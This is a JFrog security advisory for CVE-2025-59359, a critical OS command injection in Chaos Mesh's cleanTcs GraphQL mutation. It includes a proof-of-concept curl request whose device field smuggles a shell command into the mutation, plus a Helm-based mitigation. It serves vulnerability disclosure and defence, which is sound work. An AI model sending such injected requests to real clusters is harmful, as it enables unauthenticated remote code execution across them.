JFrog Security Research
< Back

JFSA-2025-001449534 - Chaos Mesh cleanTcs command injection

CVE-2025-59359 | CVSS 9.8

JFrog Severity:critical

Discovered ByNatan Nehoraiof the JFrog Security Research Team

Published 15 Sep, 2025 | Last updated 15 Sep, 2025

OS command injection in Chaos Mesh via the cleanTcs mutation

github.com/chaos-mesh/chaos-mesh

(,2.7.2]

The cleanTcs mutation in Chaos Controller Manager is vulnerable to OS command injection. In conjunction with CVE-2025-59358, this allows unauthenticated in-cluster attackers to perform remote code execution across the cluster.

curl -X POST http://10.111.136.129:10082/query -H 'Content-Type: application/json' -d '{
    "query": "mutation MutatePod($namespace: String! = \"default\", $podName: String!, $devices: [String!]!) { pod(ns: $namespace, name: $podName) { pod { name namespace } cleanTcs(devices: $devices) } }",
    "variables": {
      "namespace": "kube-system",
      "podName": "coredns-5dd5756b68-779rm",
      "devices": ["eth0 root; touch /tmp/foo; "]
    }
  }'

If upgrading Chaos-Mesh to the fixed version is not possible, re-deploy the Helm chart and disable the chaosctl tool and port:

helm install chaos-mesh chaos-mesh/chaos-mesh -n=chaos-mesh --version 2.7.x --set enableCtrlServer=false

Fix PR

JFrog Technical Blog

< Back